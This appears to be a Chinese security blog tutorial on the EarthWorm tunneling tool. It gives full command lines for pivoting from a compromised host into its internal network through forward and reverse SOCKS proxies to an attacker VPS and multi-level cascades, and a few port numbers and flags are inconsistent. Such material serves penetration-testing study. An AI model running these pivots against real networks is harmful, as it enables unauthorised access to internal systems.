内网穿透-EW贯穿内网

EW


 

官网介绍啊:EW 是一套便携式的网络穿透工具,集socks代理和端口转发与一身,支持正向、反向、多级级联方式为我们打通隧道。而且支持多系统,可在复杂网络环境(win,linux,mac之间)完成网络穿透。

官网:http://rootkiter.com/EarthWorm/

 

这工具的代理借鉴了ssocks,端口转发是借鉴了Lcx工具的使用方法,今就详细研究研究一下这个工具

工具使用


 

这里提一嘴啊,代理和端口转发不太一样

代理是我们可以使用它ip进行网络访问

端口转发是一个端口转到另一个端口,只能访问特定端口

-l 指定监听的本地端口
-d 指定反弹到的机器 ip
-e 指定反弹到的机器端口
-f 指定主动连接的机器 ip
-g 指定主动连接的机器端口

端口转发


 

和lcx用法一个样,将本机8000端口,lcx_tran映射到本机(或目标)的3389端口

ew_win32.exe -s lcx_tran -l 8000 -f 127.0.0.1 -g 3389

 

或者使用lcx_listen和lcx_slave配合实现,访问1080转发的目标(本机)的3389

ew_win32.exe -s lcx_listen -l 1080 -e 8082
ew_win32.exe -s lcx_slave -d 127.0.0.1 -e 8082 -f 192.168.10.27 -g 3389

 

 

Socks代理


 

场景:我有台VPS(192.168.10.11),和已经拿下的目标主机(外网ip:180.180.180.1,内网ip:10.10.10.2),我想通过目标主机扫内网(10.10.10.0/24)

 

正向代理

将工具上传到目标主机,开通一个端口直接变成socks5代理服务器

ew_win32.exe -s ssocksd -l 8082

 

这样我们就设置浏览器代理,使用目标ip上网了,也可以访问内网段

 

反向代理

我VPS先开8082端口等待目标主机连接,然后vps开个8000端口当代理端口

ew_win32.exe -s rcsocks -l 8000 -e 8082

 

将工具上传目标主机,并反弹到VPS的8082端口

ew_win32.exe -s rssocks -d 192.168.10.11 -e 8082

 

我们就可以连接VPS的8080端口,使用目标ip(180.180.180.1)上网了,也可以访问内网10.10.10.0/24。

此时的目标机有流量经过

 

多级级联


 

场景:一台外网服务器A(202.202.101.101,192.168.10.2),内网主机B(192.168.10.3,10.10.10.5)和内网主机C(10.10.10.6)

AB主机之间互通,BC之间互通,AC之间不能连接,BC不能出网,尝试访问C主机

 

该工具能多级级联是因为,端口转发和代理服务直接可以互通,所以实现了强大的多层内网穿透功能

 

二级级联

方法a:

B主机先开8001端口等待正向连接

ew_win32.exe -s ssocksd -l 8001

A主机使用端口映射,将A的1080端口映射到B的8001端口

ew_win32.exe -s lcx_tran -l 1080 -f 192.168.10.3 -g 8001

这样我们连接A主机的1080端口,就可以访问C主机了

 

方法b:

A主机监听1080和8080,然后A的8080端口转发到B的8001端口

ew_win32.exe -s lcx_listen -l 1080 -e 8080
ew_win32.exe -s lcx_slave -d 127.0.0.1 -e 8080 -f 192.168.10.3 -g 8001

主机B监听自身8001端口转为socks服务

ew_win32.exe -s ssocksd -l 8001

 

三级级联

场景:添加一台主机D,只能C主机访问D主机10.10.30.5

 

C主机先开8001端口等待正向连接

ew_win32.exe -s ssocksd -l 8001

B主机设置端口转发,起到中间隧道作用

ew_win32.exe -s lcx_slave -d 192.168.10.2 -e 7000 -f 10.10.10.6 -g 8081

A主机使用监听7000等待端口连接

ew_win32.exe -s lcx_listen -l 1080 -e 7000
或
ew_win32.exe -s rcsocks -l 1080 -e 7000

这样我们连接A主机的1080端口,就可以访问D主机了

 

再换个方法:

C主机反向连接B主机的8081

ew_win32.exe rssocks -d 10.10.10.5 -e 8081

B主机监听8081端口等待C主机反弹,将8080和8081打通隧道,然后连接A主机的7000并转发到B的8080

ew_win32.exe -s lcx_listen -l 8080 -e 8081
ew_win32.exe -s lcx_slave -d 192.168.10.2 -e 7000 -f 127.0.0.1 -g 8080

A主机将监听7000端口等待B主机连接

ew_win32.exe -s rcsocks -l 1080 -e 7000

这样我们连接A主机的1080即可访问D主机了

再多级就是在添加B主机的相同操作在中间当隧道即可

 

可惜


这款工具是用的非常舒服的一个、但是种种原因,已被停更和查杀了。

看到这里的大佬,动动发财的小手 点赞 + 回复 + 收藏,能【 关注 】一波就更好了

我是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家,回馈每一个读者,希望能帮到你们。

干货主要有:

① 2000多本网安必看电子书(主流和经典的书籍应该都有了)

② PHP标准库资料(最全中文版)

③ 项目源码(四五十个有趣且经典的练手项目及源码)

④ 网络安全基础入门、Linux运维,web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

 渗透测试工具大全

⑦ 2021网络安全/Web安全/渗透测试工程师面试手册大全

各位朋友们可以关注+评论一波 然后加下QQ群:581499282  备注:CSDN 联系管理大大即可免费获取全部资料

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Frp是一个常用的内网穿透工具,而宝塔是一款简单易用的服务器管理面板。将宝塔与frp搭建结合可以实现内网穿透的功能,下面是实现该功能的步骤: 1. 安装宝塔面板:通过wget命令下载宝塔面板的安装脚本,然后执行安装命令进行安装。安装完成后,通过浏览器访问服务器的IP地址,即可进入宝塔面板的登录页面。 2. 登录宝塔面板:在登录页面中输入用户名和密码,点击登录按钮即可登录到宝塔面板的控制台。 3. 添加网站:在宝塔面板控制台内,点击“网站”选项卡,然后点击“添加网站”按钮。在添加网站的页面中,填写站点名称、绑定域名等信息,并选择对应的站点目录。 4. 配置frp:在宝塔面板控制台内,点击“软件商店”选项卡,然后搜索并安装“frps”软件。安装完成后,点击“软件管理”选项卡,在列表中找到“frp”,点击“设置”按钮进行配置。 5. 配置frp参数:在frp配置页面中,填写服务器IP地址、远程端口等参数,并保存配置。然后点击“启动”按钮启动frp。 6. 完成内网穿透:在PC端安装frp客户端,然后根据frp客户端的配置文档,配置客户端的参数。将客户端与服务器进行连接,即可完成内网穿透。 通过以上步骤,我们可以通过宝塔与frp搭建一个内网穿透的环境。这样就可以实现远程访问内网服务器或应用的功能,方便了服务器管理与应用开发。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是黑客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值